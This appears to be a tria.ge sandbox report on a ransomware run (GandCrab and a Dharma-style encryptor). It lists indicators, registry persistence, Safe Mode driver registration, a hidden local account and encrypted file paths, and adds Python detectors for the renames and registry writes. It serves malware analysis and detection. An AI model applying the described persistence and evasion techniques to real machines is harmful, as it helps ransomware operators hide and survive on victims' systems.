Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
  Submitted           Analysis ID         Score
  05/02/2025, 09:34   250205-lj3hzaskdm   10
  02/02/2025, 14:19   250202-rmz5xavnfw   4
  02/02/2025, 14:17   250202-rl3veavnc1   4
  02/02/2025, 00:22   250202-an9bjaynfr   10
  02/02/2025, 00:12   250202-ahevqsylfm   10
  02/02/2025, 00:08   250202-ae1m2awpbt   10
  02/02/2025, 00:04   250202-acl2vsykbm   10

Analysis
  max time kernel:   212s
  max time network:  210s
  platform:          windows10-ltsc 2021_x64
  resource:          win10ltsc2021-20250128-en
  resource tags:     arch:x64, arch:x86, image:win10ltsc2021-20250128-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  submitted:         02/02/2025, 00:08
Static task:      static1
Behavioral task:  behavioral1
  Sample:    b231263f-0b92-4f02-9e71-3d6a05534490.jpg
  Resource:  win10ltsc2021-20250128-en
Errors
General
  Target:  b231263f-0b92-4f02-9e71-3d6a05534490.jpg
  Size:    26KB
  MD5:     99cfb36285d82796d745c8a199f6acff
  SHA1:    ab990d5b00d7878178a6e77553152149ce4f56c3
  SHA256:  afc3ff71d364c14eecc12918e7c00a435943005fc86dafa53da529f0a9c95285
  SHA512:  3a9558a9e628aac5af58f98a9e7056fe5a2741517067f0f9ebac9a800d6bd564433ab0b3910746f99e82573d2ba176241ce3d3b25961a6c27ae828c0d4defd26
  SSDEEP:  768:Z3Bt4w6U03dxH1/ARsjefQIbwTj5pW0JPfmXkD+lakhXOsX0:Z3BtNZAdxHdARkef7bQ5I8POEqY
  Note: these hashes identify the submitted .jpg only. The ransomware behaviour recorded below comes from PE files that were downloaded and executed during the run (see "Downloads MZ/PE file" and "Executes dropped EXE"); the hashes of those payloads are not listed on this page.
Malware Config
  Extracted from:  \Device\HarddiskVolume1\$RECYCLE.BIN\ADHLFQB-MANUAL.txt
  Family:          gandcrab
  URL:             http://gandcrabmfe6mnef.onion/a79f35db2daa3087
Signatures

Dharma
  Dharma (a CrySIS variant) is ransomware; in observed intrusions its operators have installed legitimate security software alongside it to disguise their activity.
Dharma family

Gandcrab
  GandCrab is ransomware that encrypts the files on a victim's computer and leaves a ransom note pointing to a Tor (.onion) payment site, as in the extracted config above.
Gandcrab family
Deletes shadow copies (3 TTPs)
  Ransomware deletes Volume Shadow Copies and other local backups to inhibit system recovery.

Grants admin privileges (1 TTP)
  Uses net.exe to change a user account's privileges or group membership.

Remote Service Session Hijacking: RDP Hijacking (1 TTP, 2 IoCs)
  Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
  pid   Process
  3792  net.exe
  2824  net1.exe

Renames multiple (113) files with added filename extension
  Many files gained the same appended extension, which suggests ransomware encrypting files across the system.

Renames multiple (245) files with added filename extension
  Many files gained the same appended extension, which suggests ransomware encrypting files across the system.
  The two counts are separate hits of the same detection. The extension being added is .id-2DAA3087.[<address>].ROGER, applied by 1sass.exe (see "Drops file in Program Files directory" below); the same eight hex digits also end the GandCrab .onion URL in the extracted config above.
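The rename signature is simple to reproduce from file events alone: an "added extension" is a path whose name equals another observed path in the same directory plus a suffix. The Python below is an added example written for this page, not tria.ge's detector. Its sample events are constructed by hand from the Program Files entries further down, the threshold is my choice, and the address inside the brackets is a placeholder because the real one is not legible on the page.

```python
"""Recover an appended ransomware extension from file events, the heuristic
behind "Renames multiple (N) files with added filename extension".
Added example for this page, not tria.ge code."""
from __future__ import annotations

import re
from collections import defaultdict
from typing import Iterable, Optional, Tuple

# Dharma-style marker: .id-<8 hex digits>.[<contact address>].<extension>
_DHARMA_MARKER = re.compile(r"^\.id-([0-9A-Fa-f]{8})\.\[([^\]]+)\]\.([A-Za-z0-9]+)$")


def added_extensions(events: Iterable[Tuple[str, str]], threshold: int = 5) -> dict[str, list[str]]:
    """Map each appended suffix to the original paths it was added to.

    A path counts as 'original + suffix' when cutting its file name at a dot
    yields another path in the same directory that was also observed. The
    longest such base wins, so dotted names (123.0.6312.123.manifest) are not
    mis-split. Suffixes seen on fewer than `threshold` files are dropped.
    """
    events = list(events)
    seen = {path.lower() for _, path in events}
    by_suffix: dict[str, set[str]] = defaultdict(set)
    for _, path in events:
        directory, sep, name = path.rpartition("\\")
        parts = name.split(".")
        for i in range(len(parts) - 1, 0, -1):
            base = directory + sep + ".".join(parts[:i])
            if base.lower() in seen:
                by_suffix["." + ".".join(parts[i:])].add(base)
                break
    return {s: sorted(b) for s, b in by_suffix.items() if len(b) >= threshold}


def parse_dharma_marker(suffix: str) -> Optional[Tuple[str, str, str]]:
    """Return (victim id, contact address, extension) for a Dharma-style suffix, else None."""
    m = _DHARMA_MARKER.match(suffix)
    return m.groups() if m else None


# Constructed sample modelled on the "Drops file in Program Files directory"
# rows on the page: each original is modified and a sibling carrying the
# marker is created. The bracketed address is a placeholder (not legible on
# the page), the victim id and .ROGER extension are the ones the page shows.
_MARKER = ".id-2DAA3087.[mail@example.invalid].ROGER"
_ORIGINALS = [
    r"C:\Program Files\desktop.ini",
    r"C:\Program Files\Mozilla Firefox\application.ini",
    r"C:\Program Files\Google\Chrome\Application\123.0.6312.123\123.0.6312.123.manifest",
    r"C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md",
    r"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.Compression.dll",
    r"C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml",
    r"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EdgeWebView.dat",
    r"C:\Program Files\Microsoft Office\root\Templates\1033\Word 2010 look.dotx",
]
SAMPLE_FILE_EVENTS = [
    e for p in _ORIGINALS for e in (("modified", p), ("created", p + _MARKER))
] + [
    # Noise that must not count: the ransom note, a legitimate archive beside
    # its uncompressed twin (a one-off ".gz" suffix), and an unrelated log.
    ("created", r"C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\ADHLFQB-MANUAL.txt"),
    ("modified", r"C:\Users\Admin\Documents\report.tar"),
    ("created", r"C:\Users\Admin\Documents\report.tar.gz"),
    ("modified", r"C:\Windows\Debug\WIA\wiatrace.log"),
]

if __name__ == "__main__":
    for suffix, originals in added_extensions(SAMPLE_FILE_EVENTS).items():
        print(f"{len(originals)} files renamed with {suffix!r}; marker fields: {parse_dharma_marker(suffix)}")
```

The detector never sees the marker constant; it recovers the suffix purely from the pairing of observed names, which is why a dotted original such as the Chrome manifest is handled by trying the longest candidate base first.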
Downloads MZ/PE file (4 IoCs)
  flow  pid   Process
  85    2268  msedge.exe   (four PE downloads on the same flow)

Modifies Windows Firewall (2 TTPs, 1 IoC)
  pid   Process
  1280  netsh.exe

Sets file to hidden (1 TTP, 1 IoC)
  Modifies file attributes so the file is not shown in Explorer and similar listings.
  pid   Process
  4860  attrib.exe
Sets service image path in registry (2 TTPs, 9 IoCs)
  All nine values were written by mssql.exe. Each points a service's ImagePath at a .sys file under C:\Users\Admin\Downloads\ac\, a user-writable directory; legitimate drivers are installed under the system directory, so a kernel driver registered from a user profile path is a strong indicator on its own. Values are shown as the page renders them, with doubled backslashes.
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hjubzxoikmwdrbiv\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\hjubzxoikmwdrbiv.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dxhyvquwxmzrokdf\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\dxhyvquwxmzrokdf.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rpmuptzhkqmqdj\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\rpmuptzhkqmqdj.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qiwxkllcnwvbwfmxg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\qiwxkllcnwvbwfmxg.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\nqekkuxuvtalqgr\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\nqekkuxuvtalqgr.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hzbntjtujfideuji\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\hzbntjtujfideuji.sys"  mssql.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vomweobolnmuezb\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\vomweobolnmuezb.sys"  mssql.exe
Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely to geofence execution.
  Key value queried  \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Control Panel\International\Geo\Nation  Dharma.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Control Panel\International\Geo\Nation  GandCrab.exe

Credentials from Password Stores: Windows Credential Manager (1 TTP)
  Suspicious access to the credential history store.
Drops startup file (3 IoCs)
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sass.exe  1sass.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\ADHLFQB-MANUAL.txt  GandCrab.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\2daa376b2daa30837a.lock  GandCrab.exe
  The copy of 1sass.exe in the user's Startup folder is genuine persistence. The two Word STARTUP entries are most likely GandCrab writing its ransom note and lock file into every directory it walks, the folder name simply matching the signature's pattern.
Executes dropped EXE (8 IoCs)
  pid   Process
  464   Dharma.exe
  1648  nc123.exe
  2232  mssql.exe
  4236  mssql2.exe
  3524  SearchHost.exe
  3204  1sass.exe
  5636  Fantom.exe
  5232  GandCrab.exe
  SearchHost.exe and 1sass.exe are dropped binaries borrowing the names of Windows components (the search host and lsass.exe); where they appear in later signatures, the pid, not the name, identifies them.
Impair Defenses: Safe Mode Boot (1 TTP, 14 IoCs)
  mssql.exe registers seven of its drivers under SafeBoot\Minimal, the list of drivers and services Windows still loads in Safe Mode, and also deletes those entries: each of the seven driver names appears once as "Key created" and once as "Key deleted". The two drivers without SafeBoot entries are mssql.sys and mssqlaq.sys.
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rpmuptzhkqmqdj.sys  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HZBNTJTUJFIDEUJI.SYS  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vomweobolnmuezb.sys  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HJUBZXOIKMWDRBIV.SYS  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DXHYVQUWXMZROKDF.SYS  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VOMWEOBOLNMUEZB.SYS  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dxhyvquwxmzrokdf.sys  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nqekkuxuvtalqgr.sys  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hjubzxoikmwdrbiv.sys  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\NQEKKUXUVTALQGR.SYS  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\RPMUPTZHKQMQDJ.SYS  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hzbntjtujfideuji.sys  mssql.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qiwxkllcnwvbwfmxg.sys  mssql.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QIWXKLLCNWVBWFMXG.SYS  mssql.exe
Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\\Windows\\System32\\1sass.exe"  1sass.exe
Drops desktop.ini file(s) (15 IoCs)
  All entries are "File opened for modification" by 1sass.exe. The F:\$RECYCLE.BIN entry shows the encryptor walked a second volume, not only C:.
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini
  C:\Program Files\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
  C:\Program Files (x86)\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini
  F:\$RECYCLE.BIN\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini
  C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini
  C:\$Recycle.Bin\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini
Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of drives other than the default C: drive. All entries are "File opened (read-only)" on the drive root:
  GandCrab.exe:    B:, D:, G:, H:, I:, J:, K:, L:, M:, N:, O:, P:, Q:, R:, S:, T:, U:, V:, W:, X:, Y:, Z:  (22 letters)
  nc123.exe:       A:
  SearchHost.exe:  E:

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  84    raw.githubusercontent.com
  85    raw.githubusercontent.com
  Flow 85 is the flow on which msedge.exe downloaded the four PE files listed under "Downloads MZ/PE file".
Password Policy Discovery (1 TTP)
  Attempts to access detailed information about the password policy used within an enterprise network.

Drops file in System32 directory (1 IoC)
  File created  C:\Windows\System32\1sass.exe  1sass.exe

Hide Artifacts: Hidden Users (1 TTP, 1 IoC)
  Setting a user name to 0 under Winlogon\SpecialAccounts\UserList removes that account from the logon screen and the Users control panel without disabling it. Here the write landed under WOW6432Node, the 32-bit registry view, which indicates reg.exe ran as a 32-bit process; before concluding the account is actually hidden on this 64-bit host, check whether the same value exists under the native Winlogon key, since that is the one Winlogon reads.
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"  reg.exe
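The registry signatures above that describe writes (service ImagePath, SafeBoot\Minimal, Run key, SpecialAccounts\UserList) can all be checked with one parser, because the report prints every registry row as "<operation> <key>[ = "<value>"] <process>". The following Python is an added example for this page and is not tria.ge code: the rule names are mine, the sample rows are copied by hand from the entries above plus two benign rows that must not fire, and registry values are written with single backslashes rather than the doubled form the page renders.

```python
"""Triage registry rows in the report's own row format and flag the
persistence and defence-evasion patterns seen on this page.
Added example for this page, not tria.ge code."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Operations as the report prints them, longest alternatives first.
_OPS = (r"Set value \((?:str|int|data)\)|Key value enumerated|Key value queried"
        r"|Key created|Key deleted|Key opened|Key queried")
# Keys may contain spaces ("Windows NT"), so the process is taken as the final
# whitespace-free token and everything in between is key plus optional value.
_ROW = re.compile(rf"^(?P<op>{_OPS})\s+(?P<rest>.+?)\s+(?P<proc>\S+)$")

_SERVICE_IMAGE = re.compile(r"\\Services\\[^\\]+\\ImagePath$", re.I)
_SAFEBOOT = re.compile(r"\\Control\\SafeBoot\\(?:Minimal|Network)\\", re.I)
_HIDDEN_USER = re.compile(r"\\Winlogon\\SpecialAccounts\\UserList\\[^\\]+$", re.I)
_RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
# Directories an unprivileged user can write to; a driver loaded from one of
# these is the pattern mssql.exe shows above. The list is an assumption.
_USER_WRITABLE = re.compile(r"\\(?:Users|ProgramData|Temp)\\", re.I)


@dataclass(frozen=True)
class RegEvent:
    op: str
    key: str
    value: Optional[str]
    process: str


@dataclass(frozen=True)
class Finding:
    rule: str
    event: RegEvent


def parse_event(row: str) -> RegEvent:
    """Split '<op> <key>[ = "<value>"] <process>' into its fields."""
    m = _ROW.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    rest, value = m.group("rest"), None
    if ' = "' in rest:
        rest, value = rest.split(' = "', 1)
        value = value.rstrip('"')
    return RegEvent(m.group("op"), rest, value, m.group("proc"))


def _image_target(value: str) -> str:
    """Drop the NT object-manager prefix (\\??\\) so the path can be inspected."""
    return value[4:] if value.startswith("\\??\\") else value


def triage(rows: Iterable[str]) -> list[Finding]:
    """Apply the four rules to each row; benign rows produce no finding."""
    findings: list[Finding] = []
    for row in rows:
        ev = parse_event(row)
        is_write = ev.op.startswith("Set value")
        if is_write and ev.value and _SERVICE_IMAGE.search(ev.key) \
                and _USER_WRITABLE.search(_image_target(ev.value)):
            findings.append(Finding("service-imagepath-user-writable", ev))
        elif ev.op == "Key created" and _SAFEBOOT.search(ev.key):
            findings.append(Finding("safeboot-driver-registered", ev))
        elif is_write and ev.value == "0" and _HIDDEN_USER.search(ev.key):
            findings.append(Finding("hidden-local-account", ev))
        elif is_write and _RUN_KEY.search(ev.key):
            findings.append(Finding("run-key-persistence", ev))
    return findings


# Constructed sample: rows copied from the signatures above, plus a stock
# driver (services.exe writing Beep's ImagePath) and a locale lookup that
# must not fire. Backslashes are single here; the page renders them doubled.
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hjubzxoikmwdrbiv\ImagePath = "\??\C:\Users\Admin\Downloads\ac\hjubzxoikmwdrbiv.sys" mssql.exe',
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Beep\ImagePath = "\SystemRoot\System32\drivers\beep.sys" services.exe',
    r'Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rpmuptzhkqmqdj.sys mssql.exe',
    r'Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\RPMUPTZHKQMQDJ.SYS mssql.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" reg.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\Windows\System32\1sass.exe" 1sass.exe',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.rule:32} {f.event.process:12} {f.event.key}")
```

The ImagePath rule deliberately keys on where the driver lives rather than on the service name, since the names here are random; the SafeBoot rule fires on creation only, so the matching deletions (which the page also shows) do not double-count.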
Drops file in Program Files directory (64 IoCs, list capped)
  All entries are 1sass.exe, the process applying the Dharma-style extension. "modified" is the page's "File opened for modification", "created" its "File created". Pairs of an original name and the same name with the extension added are the encrypt-and-rename pass. The "[[email protected]]" token inside the extension is a redaction artefact of the extracted page, not the real contact address.
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Microsoft Office\root\Templates\1033\ExpenseReport.xltx
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\WindowsBase.resources.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\System.Windows.Forms.Design.resources.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png
  created   C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.IO.FileSystem.AccessControl.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js
  modified  C:\Program Files\desktop.ini.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL054.XML
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Globalization.dll
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.tree.dat.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Collections.Concurrent.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg
  modified  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EdgeWebView.dat.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js
  modified  C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\LICENSE
  modified  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.CSharp.dll
  created   C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ServiceModel.Web.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Microsoft Office\root\Templates\1033\Word 2010 look.dotx.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\UIAutomationClientSideProviders.resources.dll.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Linq.dll
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\ui-strings.js
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\optimize_poster.jpg.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Google\Chrome\Application\123.0.6312.123\123.0.6312.123.manifest.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\PresentationFramework.resources.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr\UIAutomationClient.resources.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nl-nl.dll
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.ServicePoint.dll
  created   C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.Tracing.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\UIAutomationClientSideProviders.resources.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\UIAutomationTypes.resources.dll.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Common Files\microsoft shared\ink\ipsrus.xml
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.Compression.dll.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Mozilla Firefox\application.ini.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\ui-strings.js
  modified  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.Primitives.dll
  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif
